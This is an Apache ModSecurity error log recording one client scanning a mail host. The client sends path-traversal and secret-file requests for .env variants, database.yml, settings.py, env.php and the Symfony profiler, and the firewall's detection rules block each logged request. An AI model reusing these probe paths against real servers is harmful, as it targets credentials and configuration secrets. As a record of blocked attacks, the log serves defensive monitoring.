[Tue May 12 05:30:36.978796 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3Nr1yOh9Tvizezif-AAAAEY"]
[Tue May 12 05:30:36.980607 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe3BfeipD4uoG21FoxCgAAABQ"]
[Tue May 12 05:30:36.980816 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe3BfeipD4uoG21FoxCgAAABQ"]
[Tue May 12 05:30:37.014384 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/storage/.env"] [unique_id "agKe3dr1yOh9Tvizezif-wAAAEY"]
[Tue May 12 05:30:37.014573 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/storage/.env"] [unique_id "agKe3dr1yOh9Tvizezif-wAAAEY"]
[Tue May 12 05:30:37.635734 2026] [security2:error] [pid 1844863:tid 1844883] [client 119.28.89.249:49262] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.moncampingcarenligne.com"] [uri "/"] [unique_id "agKe3faAnTZtx1_H_wy3iwAAAU4"]
[Tue May 12 05:30:37.789541 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3BfeipD4uoG21FoxCgAAABQ"]
[Tue May 12 05:30:37.830653 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe3RfeipD4uoG21FoxDQAAABQ"]
[Tue May 12 05:30:37.830903 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe3RfeipD4uoG21FoxDQAAABQ"]
[Tue May 12 05:30:37.900313 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3dr1yOh9Tvizezif-wAAAEY"]
[Tue May 12 05:30:37.936553 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/www/.env"] [unique_id "agKe3dr1yOh9Tvizezif_wAAAEY"]
[Tue May 12 05:30:37.936767 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/www/.env"] [unique_id "agKe3dr1yOh9Tvizezif_wAAAEY"]
[Tue May 12 05:30:38.650597 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3RfeipD4uoG21FoxDQAAABQ"]
[Tue May 12 05:30:38.690664 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe3hfeipD4uoG21FoxEAAAABQ"]
[Tue May 12 05:30:38.690868 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe3hfeipD4uoG21FoxEAAAABQ"]
[Tue May 12 05:30:38.737741 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3dr1yOh9Tvizezif_wAAAEY"]
[Tue May 12 05:30:39.489367 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3hfeipD4uoG21FoxEAAAABQ"]
[Tue May 12 05:30:39.530232 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe3xfeipD4uoG21FoxFAAAABQ"]
[Tue May 12 05:30:39.530309 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe3xfeipD4uoG21FoxFAAAABQ"]
[Tue May 12 05:30:39.530476 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe3xfeipD4uoG21FoxFAAAABQ"]
[Tue May 12 05:30:40.367061 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3xfeipD4uoG21FoxFAAAABQ"]
[Tue May 12 05:30:40.406191 2026] [core:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 05:30:40.530211 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/_profiler/open"] [unique_id "agKe4Nr1yOh9TvizezigCAAAAEY"]
[Tue May 12 05:30:40.530642 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/_profiler/open"] [unique_id "agKe4Nr1yOh9TvizezigCAAAAEY"]
[Tue May 12 05:30:41.332456 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe4Nr1yOh9TvizezigCAAAAEY"]
[Tue May 12 05:30:41.368509 2026] [core:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 05:30:42.279068 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.247:6922] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/_profiler/open"] [unique_id "agKe4hfeipD4uoG21FoxKAAAAA4"]
[Tue May 12 05:30:42.279513 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.247:6922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/_profiler/open"] [unique_id "agKe4hfeipD4uoG21FoxKAAAAA4"]
[Tue May 12 05:30:42.281239 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe4s1tk6y7yBJLpJo6QQAAAI4"]
[Tue May 12 05:30:42.281317 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe4s1tk6y7yBJLpJo6QQAAAI4"]
[Tue May 12 05:30:42.281477 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe4s1tk6y7yBJLpJo6QQAAAI4"]
[Tue May 12 05:30:43.109234 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe4s1tk6y7yBJLpJo6QQAAAI4"]
[Tue May 12 05:30:43.152159 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe481tk6y7yBJLpJo6SgAAAI4"]
[Tue May 12 05:30:43.152235 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe481tk6y7yBJLpJo6SgAAAI4"]
[Tue May 12 05:30:43.152398 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe481tk6y7yBJLpJo6SgAAAI4"]
[Tue May 12 05:30:43.179185 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.247:6922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe4hfeipD4uoG21FoxKAAAAA4"]
[Tue May 12 05:30:43.966139 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe481tk6y7yBJLpJo6SgAAAI4"]
